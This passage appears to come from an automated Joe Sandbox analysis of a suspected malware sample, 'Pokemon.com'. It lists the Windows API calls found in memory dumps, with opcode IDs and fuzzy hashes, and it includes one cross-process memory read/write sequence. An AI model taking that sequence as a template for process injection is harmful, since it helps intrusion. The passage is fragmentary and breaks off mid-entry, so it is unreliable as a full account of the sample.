                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100D0C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ff4269edfc33c2889bd357886b7ff4633f52e6737fffa99aa1313ac1f863f3c3
                                                                                                                                                                                                                                                                                      • Instruction ID: 34c1516414449b10db9bd40bae1fd2a7f9ad553736bd12fd54fcd926db03d04a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff4269edfc33c2889bd357886b7ff4633f52e6737fffa99aa1313ac1f863f3c3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0401DC71800B059FCB31AFA6D980912FAF9BF503157108A3FD19252961C7B0A888CF80
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 000F65BF
                                                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 000F65D6
                                                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 000F65EE
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 000F660A
                                                                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 000F6624
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bc0fa0742bdf5122ddb5d8703a06972b5528de9c2c56b816e86d32247c979787
                                                                                                                                                                                                                                                                                      • Instruction ID: ebb2df30e86ae285d85bb7ba983475ae786047c6a66fbfe00776a61bdc4b7268
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc0fa0742bdf5122ddb5d8703a06972b5528de9c2c56b816e86d32247c979787
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71013630500708BBEB355F20ED4EBA67BB8FB10B05F000559A687A18E1DBF5AA959B54
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDAD2
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDAE4
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDAF6
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDB08
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDB1A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0d5c046fa998d3dc55f7f1577fd7937a46b99764829d48335ec0b826df7343b5
                                                                                                                                                                                                                                                                                      • Instruction ID: a47c150e92c1a80a4f52cb6d8cf3a4c0e809a1da680eb529233b5640c18abbcd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d5c046fa998d3dc55f7f1577fd7937a46b99764829d48335ec0b826df7343b5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06F0F472544305EB86A4EB68F982E5E77EDAF147117A50C1EF01ADBD22CB20FCC08B65
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C262E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2640
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2653
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2664
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2675
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 233724bce3684ffe46e196ec90005d7d6a55e235e3c23f0fb666c0e41b6c0bc1
                                                                                                                                                                                                                                                                                      • Instruction ID: 2dd31eead328c6ac1d360cccf315831846cf79be0a1cc281224e1242c5944dd4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 233724bce3684ffe46e196ec90005d7d6a55e235e3c23f0fb666c0e41b6c0bc1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0DA70841620AB8612EF58FC11E8C3BA4FB24B51305094EF415D6EB6CBB149C1AF95
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __freea$_free
                                                                                                                                                                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                      • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                      • Opcode ID: 0b481936d4d535e2d268a7560ccb0cc4f71d0babae656fe18e7eef56d0973807
                                                                                                                                                                                                                                                                                      • Instruction ID: e1ea52812207ab7e3560c6e8589d9f3b8f444d63ecaf0de2f7dd1cda1b94bf61
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b481936d4d535e2d268a7560ccb0cc4f71d0babae656fe18e7eef56d0973807
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDD1D075910206DADB689F68C895FFEB7F1EF07300F28415EE942AB692D7359D80CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000F2B1D,?,?,00000034,00000800,?,00000034), ref: 000FBDF4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000F30AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000F2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 000FBDBF
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 000FBD1C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 000FBD2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 000FBD42
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000F311A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000F3167
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: cd5680ea6848fa1bf0eb105ae57d11a3cddca2ef0a5188b0dd40161b726f5c5c
                                                                                                                                                                                                                                                                                      • Instruction ID: 3aeba8c999647bd607c529e7ad6708d71d9465831381509a15bd09a04390c50e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd5680ea6848fa1bf0eb105ae57d11a3cddca2ef0a5188b0dd40161b726f5c5c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4141167290021CBEDB10DBA4CD86AEEBBB8EF49714F004095EA45B7181DA706E85DFA1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\208079\Pokemon.com,00000104), ref: 000C1AD9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C1BA4
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C1BAE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                      • API String ID: 2506810119-2970016477
                                                                                                                                                                                                                                                                                      • Opcode ID: 2f8f0c1a45193d389cdd146f1ad1f1cf2822953913e3405c3082e1ca572f0618
                                                                                                                                                                                                                                                                                      • Instruction ID: af0f527697eef48da8975ff600a6eb9beefdf7de8935d52cf94c48a6a0d26df7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8f0c1a45193d389cdd146f1ad1f1cf2822953913e3405c3082e1ca572f0618
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A318371A40218AFCB21DB99DC85EDEBBFCEF85710B1041AEE80497212E7B04E41DB91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000FCBB1
                                                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 000FCBF7
                                                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001629C0,00A85C18), ref: 000FCC40
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0012DCD0,00000000,?,?,?,?), ref: 00124F48
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 00124F65
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00124F75
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00113AD4,?,?), ref: 00113DD5
                                                                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00113AD7
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00113AF8
                                                                                                                                                                                                                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00113B63
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                      • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001249DC
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001249F0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00124A14
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001251A3
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001251B1
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001251B8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001242DC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001242EC
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00124312
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0010544D
                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001054A1
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,0012DCD0), ref: 00105515
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00124CED
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00124D02
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00124D0F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F3712
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F3723
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: GetCurrentThreadId.KERNEL32 ref: 000F372A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000F3731
                                                                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 000F38C4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F373B: GetParent.USER32(00000000), ref: 000F3746
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 000F390F
                                                                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,000F3987), ref: 000F3937
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00126360
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0012638D
                                                                                                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 0012639C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 9eb8d9f88ba96ae21f1b9611260281b0cd776f09daa8142d729c4e60dc8beb42
                                                                                                                                                                                                                                                                                      • Instruction ID: 830df520c61c5f65f7976bd11c24585f66319a7c25449e8a3102cee6272eb5c6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9eb8d9f88ba96ae21f1b9611260281b0cd776f09daa8142d729c4e60dc8beb42
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1018C71910228AFDB219F15EC84BEE7BB5FF44351F108099E84AD6191DB708AA6EF21
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: acad529ae0ac5ab7b03c8b5a09a469a20625d8e329f984d721a7e69576642008
                                                                                                                                                                                                                                                                                      • Instruction ID: 86692b1feea963d9fb1e5c57de8a9574d1e4303bf4310460ba59e7cb29e0efae
